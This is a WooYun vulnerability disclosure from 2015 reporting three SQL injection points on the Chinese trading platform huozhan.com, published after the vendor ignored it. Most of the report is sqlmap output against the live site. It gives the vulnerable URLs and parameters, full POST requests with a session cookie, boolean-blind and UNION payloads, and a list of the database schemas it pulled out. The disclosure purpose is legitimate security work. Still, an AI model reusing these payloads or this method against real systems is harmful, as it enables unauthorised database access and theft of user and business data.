当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152906

漏洞标题:p2p安全之货栈网注入漏洞打包

相关厂商:货栈网

漏洞作者: 路人甲

提交时间:2015-11-11 00:19

修复时间:2015-12-26 00:20

公开时间:2015-12-26 00:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

多个注入打包提交

详细说明:

作为零售业、超市行业的商品供应商,常常饱受超市的各种名目繁多的进店费、赞助费、广告费、条码费、堆头费、店庆费。。。,结算账期短则7天,长则60天。
货栈网是一种创新的电子商务交易模式平台,为供应商提供全新的营销方式,通过这个交易平台,货栈网帮助供应商发展店铺(销售渠道),商品价格、新品、促销、账户资金全部由供应商自主掌握,货栈网作为您的‘业务员’,按量取酬,供应商只需轻松注册、保证货真价实,即可获得区域内数百个店铺(买家)会员的青睐。
好了
说正事^_^
找了三枚注入(应该不止 不深挖了) 跟别人提交的不会重复吧
注入一:

http://www.huozhan.com:80/HelpAction_showNewsDeatil.do?areaCode=010BJ&newsId=8065


GET parameter 'areaCode' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: areaCode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: areaCode=010BJ' AND 6922=6922 AND 'skOh'='skOh&newsId=8065
---
[00:40:23] [INFO] testing MySQL
[00:40:23] [WARNING] the back-end DBMS is not MySQL
[00:40:24] [INFO] testing Oracle
[00:40:27] [INFO] confirming Oracle
[00:40:30] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[00:40:30] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMS
[00:40:30] [INFO] fetching database (schema) names
[00:40:30] [INFO] fetching number of databases
[00:40:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:40:30] [INFO] retrieved: 7
[00:40:36] [INFO] retrieved: HRZMART
[00:42:29] [INFO] retrieved: HUOZHAN
[00:44:25] [INFO] retrieved:
[00:44:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
OUTLN
[00:46:25] [INFO] retrieved: SHOP
[00:46:59] [INFO] retrieved: SYS
[00:47:20] [INFO] retrieved: SYSTEM
[00:48:07] [INFO] retrieved: WMSYS
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS


注入二:
post.txt

POST /SupplierItemCate_searchProductList.do?AREA_CODE=0317cz2&brand=3466&categoryId=&myNews=myNews&searchValue=&SUPPLIER_CODE=73178008 
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.huozhan.com:80/
Cookie: JSESSIONID=E7A86CA57388B857EDDEF7EE32C79B76
Host: www.huozhan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AREA_CODE=0317cz2&categoryCode=&currPage=1&displayType=&ITEM_CODE=&searchValue=&SUPPLIER_CODE=73178008


GET parameter 'brand' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: brand (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: AREA_CODE=0317cz2&brand=3466 AND 5394=5394&categoryId=&myNews=myNews&searchValue=&SUPPLIER_CODE=73178008
---
[00:58:06] [INFO] testing MySQL
[00:58:09] [WARNING] the back-end DBMS is not MySQL
[00:58:09] [INFO] testing Oracle
[00:58:10] [INFO] confirming Oracle
[00:58:20] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[00:58:20] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:58:20] [INFO] fetching database (schema) names
[00:58:20] [INFO] fetching number of databases
[00:58:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:58:20] [INFO] retrieved:


注入三:
post.txt

POST /LogonAction_zjsave.do HTTP/1.1
Content-Length: 351
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.huozhan.com:80/
Cookie: JSESSIONID=E7A86CA57388B857EDDEF7EE32C79B76
Host: www.huozhan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ACTIVATION_DATE=01/01/1967&AREA_CODE=010BJ&CREDENTIAL_NAME=ichtjtwy&CREDENTIAL_TYPE=3&END_DATE=01/01/1967&EXPLANATION=11/2011&IMAGE_NAME=ichtjtwy&MEMBER_CODE=492091&MEMBER_TYPE=2&PROMULGATION=1&ssp=1&tj=%e5%ae%8c%e6%88%90&tj=%e7%bb%a7%e7%bb%ad%e6%b7%bb%e5%8a%a0&upload=%e4%b8%8a%e4%bc%a0%e5%9b%be%e7%89%87


POST parameter 'MEMBER_CODE' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 105 HTTP(s) requests:
---
Parameter: MEMBER_CODE (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: ACTIVATION_DATE=01/01/1967&AREA_CODE=010BJ&CREDENTIAL_NAME=ichtjtwy&CREDENTIAL_TYPE=3&END_DATE=01/01/1967&EXPLANAT
3)||CHR(111)||CHR(97)||CHR(114)||CHR(84)||CHR(87)||CHR(82)||CHR(112)||CHR(109)||CHR(106)||CHR(101)||CHR(77)||CHR(86)||CHR(109)|
R(108)||CHR(84)||CHR(118)||CHR(109)||CHR(85)||CHR(113)||CHR(98)||CHR(107)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL FROM DUA
---
[01:22:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:22:58] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[01:22:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other
[01:22:58] [INFO] fetching database (schema) names
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS


漏洞证明:

涉及7个数据库:(dba)

7个数据库-dba.png


主库469个表:

HUOZHAN-469张表.png


太慢就不深入了、、、、、

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评价